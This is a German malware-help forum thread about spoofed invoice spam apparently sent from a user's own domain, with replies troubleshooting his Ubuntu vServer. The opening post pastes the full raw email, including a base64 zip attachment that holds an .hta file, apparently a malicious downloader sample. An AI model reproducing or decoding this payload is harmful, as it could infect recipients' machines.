|
Plagegeister aller Art und deren Bekämpfung: Spam von meinem Server!Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
13.09.2016, 11:28 | #1 |
| Spam von meinem Server! Hallo. Ich bekomme in letzter Zeit Spam anscheinend von mir selbst. Meine Domain ist x4z.at Ich habe den Server noch nicht sehr lange genau wie die Domain. Bitte helft mir. Hier der Quellcode der Mail: Code:
ATTFilter Received: from [80.67.18.3] (helo=mx03.ispgateway.de) by cybermen.ispgateway.de with esmtp (Exim 4.68) (envelope-from <CreditControl@x4z.at>) id 1bjkoK-0002ik-GS; Tue, 13 Sep 2016 12:19:28 +0200 Return-path: <CreditControl@x4z.at> X-Envelope-To: xi@x4z.at Received: from [103.59.212.250] by mx03.ispgateway.de with esmtp (Exim 4.84) (envelope-from <CreditControl@x4z.at>) id 1bjkoJ-0000P4-KI for xi@x4z.at; Tue, 13 Sep 2016 12:19:28 +0200 Thread-Topic: Accounts Documentation - Invoices thread-index: AdHMh8B0kJBJjfR0RcOn5cXLuenVVA== Reply-To: <CreditControl@x4z.at> From: <CreditControl@x4z.at> Sender: To: <xi@x4z.at> CC: Date: Tue, 13 Sep 2016 15:49:26 +0530 Message-ID: <5C28085E870B315BB0B97C5C71DB95B9C6@x4z.at> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0DFA_01D1CC90.223A0640" X-Mailer: Microsoft CDO for Windows 2000 Content-Class: urn:content-classes:message Importance: normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609 X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on spamfilter03.ispgateway.de X-Spam-Level: ********** X-Spam-Status: No, hits=10.0 required=9999.0 tests=BAYES_50,CMAE_1 autolearn=disabled version=3.3.1 X-Spam-CMAETAG: v=2.1 cv=EJuI0jpC c=1 sm=0 tr=0 p=ddeUt4UfM8jf4zcyEuoA:9 a=LLNjDRYO+oScLz7RBlOp7A==:17 a=GW1xBdLrtEIA:10 a=ixs-9iEekRYS7RO_:21 a=4HBzJjo-5mCsLJkQ:21 a=Vd5fxke5924A:10 a=3m4wqbA_A80A3ERjOPQA:9 a=IKIoO-ieCDEA:10 a=5MxXyNQ-P-6J4PTiW665:22 a=KXHENKN6KLPQ5DguwkeP:22 a=FBY8rotfuuftQjdf53JD:22 a=egmqKKJDtk7Z2uYzDyHN:22 xcat=Undefined/Undefined X-Spam-CMAECATEGORY: 0 X-Spam-CMAESUBCATEGORY: 0 X-Spam-CMAESCORE: 100 Subject: [SPAM] Accounts Documentation - Invoices ------=_NextPart_000_0DFA_01D1CC90.223A0640 Content-Type: text/plain Content-Transfer-Encoding: 7bit Please find attached the invoice(s) raised on your account today. If you have more than one invoice they will all be in the single attachment above. If you have any queries please do not hesitate to contact the Credit Controller who deals with your account. Alternatively if you do not know the name of the Credit Controller you can contact us at: CreditControl@x4z.at Please do not reply to this E-mail as this is a forwarding address only. ------=_NextPart_000_0DFA_01D1CC90.223A0640 Content-Type: application/zip; name="~576843128492.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="~576843128492.zip" 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 ------=_NextPart_000_0DFA_01D1CC90.223A0640-- |
13.09.2016, 11:45 | #2 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server! Und wie soll dir hier jmd helfen?
__________________Du schreibst ja nichtmal was für ein Server das sein soll
__________________ |
13.09.2016, 12:00 | #3 |
| Spam von meinem Server! Sorry.
__________________Bin leicht in Panik da ich noch nicht lange mit Ubuntu arbeite und ich ansich noch nichts großes damit gemacht habe außer Updates, Upgrades, Apache2, MySQL, Phpmyadmin, Teamspeak3 Server und SteamCMD sowie Garrys Mod Server. Operating System: Ubuntu 16.04 64 Bit |
13.09.2016, 12:14 | #4 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server! Musst du den komplett selbst warten, also voller root Zugriff Oder ist da irgendwas managed? Also GRUNDSÄTZLICH sagt man, lass die Finger von einem root server wenn du wenig bis keine Erfahrung von dem Zeug hast, dann wenn was passiert bist du VOLL verantwortlich dafür.
__________________ Logfiles bitte immer in CODE-Tags posten |
13.09.2016, 15:38 | #5 |
| Spam von meinem Server! Der Server ist eigentlich nur online wenn ich daran arbeite/lerne oder darauf Spiele. Daher ging ich davon aus das nichts all zu schlimmes passieren kann. Ich Frage mich nur wie es jetzt passieren konnte das jemand Spam von dem Server verschicken kann. Daher Frage ich hier nach um dem auf den Grund zu gehen. Es könnte aber auch sein das es garnicht der Server ist sondern bei Domainfactory wo die Domain gehostet ist. |
13.09.2016, 15:47 | #6 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server! Ja, das musst du vllt mal selber beurteilen ob da in Kopfzeilen die IP deines Servers auftaucht....das kann ich doch nicht wissen! Und wie bitte soll der Server denn offline sein? Rufst du beim Hoster an, die mögen mal auf den Powerbutton drücken weil du jetzt was machen willst?
__________________ --> Spam von meinem Server! |
13.09.2016, 17:30 | #7 |
| Spam von meinem Server! Ich kann den Server über ein Webinterface des Anbieters starten, beenden und rebooten. Ich hätte evtl erwähnen sollen das es ein vServer ist. Mein Fehler. Die erste IP ist Domainfactory und die zweite eine aus Indien. Hoster INTECHONLINE-IN Intech Online Private Limited, IN. Mehr konnte ich nicht erfahren bisher. |
13.09.2016, 20:03 | #8 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server! DAS ist doch mal ne Info D.h. du hast Zugang zu diesem System also zu deinem vServer NUR über dieses Weninterface? Nix anderes? Du selbst muss keine Updates für Linux(kernel), Apache, MysQL etc einspielen? Du hast keinen SSH-Zugang?
__________________ Logfiles bitte immer in CODE-Tags posten |
13.09.2016, 23:06 | #9 |
| Spam von meinem Server! Ich kann den Server über ein Webinterface starten, rebooten und stoppen sowie Reinstall des OS. Ich habe vollen root Zugriff über SSH. Habe aber den standart SSH Port geändert. Zudem habe ich einen neuen "sudo" Benutzer angelegt und den root deaktiviert in der SSH Config. Ich nutze Putty und der Login läuft über das Key System. Ich habe beim ersten Systemstart Kernel aktuallisiert von 4.4 auf 4.6 sowie update und upgrade durchgeführt. Für jedes Programm gibt es einen eigenen Benutzer da auch Fremdsoftware (Teamspeak3 und SteamCMD mit Gerrys Mod Server) installiert wurde. Die Passwörter der Benutzer wurden mit Kaspersky Passwort Manager generiert und sollten eigentlich sicher sein. Mein PC habe ich mit Malwarebytes Anti Malware, Emsisoft Emergency Kit Scanner, Kaspersky Total Security sowie adwcleaner.exe und securitycheck.exe untersucht, ohne Funde, daher denke ich nicht das die schwachstelle an meinem PC liegt. Ich gehe davon aus das es am Garrys Mod Server oder den nachinstallierten Addons liegt. Ich hoffe mit den Infos können wir schon einiges abhaken von der Fehlerliste^^ Geändert von xxlynusxx (14.09.2016 um 00:03 Uhr) |
14.09.2016, 10:09 | #10 | |||
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server! Also hast du doch nen root server - und bist damit komplett selbst verantwortlich für das was da läuft. Ja, damit nimmt man den Server aus der Schusslinie, die ganzen Bots probieren idR ja nur Port 22 aus, ein SSH-Angreifer müsste den richtigen Port erstmal erraten. Zitat:
Was meinst du mit Key System? Auth nur per RSA Key? Oder auch per Passwort möglich? Zitat:
Ubuntu 16.04 und auch das erste Pointrelease haben diesen jungen Kernel noch nicht sondern sind bei 4.4 Aktuell isses 4.4.0-36.55-generic (4.4.16) Zitat:
- hast du überhaupt sowas wie exim oder postfix installiert (mit apt oder dpkg prüfen) und wenn ja wie ist es konfiguriert - taucht jetzt nun deine Server-IP in der Kopfzeile auf (muss ja nicht das Beispiel sein was du gepostet hast) Aus deinem Beispiel: Code:
ATTFilter Received: from [103.59.212.250] by mx03.ispgateway.de with esmtp (Exim 4.84) (envelope-from <CreditControl@x4z.at>) id 1bjkoJ-0000P4-KI for xi@x4z.at; Tue, 13 Sep 2016 12:19:28 +0200
__________________ Logfiles bitte immer in CODE-Tags posten |
14.09.2016, 12:26 | #11 |
| Spam von meinem Server! Meine Server IP taucht nicht auf. Exim oder postfix ist nicht von mir installiert worden. Ich hatte kurzzeitig, testweise mal Linux Desktop installiert und per Remote Desktop gesteuert. Könnte das dort mit installiert worden sein? Nun muss ich auf der Homepage erstmal sichtbar eine Erklärung abgeben das der Spam nicht von mir kommt. Zum Kernel How to Install Linux Kernel 4.6 in Ubuntu 16.04 | UbuntuHandbook |
14.09.2016, 12:48 | #12 | |||
/// Winkelfunktion /// TB-Süch-Tiger™ | Spam von meinem Server!Zitat:
Zitat:
Was genau soll "Linux Desktop" sein. Für Linux gibt es einige DEs wie mate, xfce, lxde, ... falls du denn sowas meinst und nicht etwas völlig anderes Remote Desktop ist eine proprietäre Lösung von Microsoft und AFAIK ziemlich unüblich bei Debian/Ubuntu - zumindest als Server, remmina kann aber als rdp-client benutzt werden. Normalerweise administratiert man Linux-Server entfernt über SSH an der Konsole. Zitat:
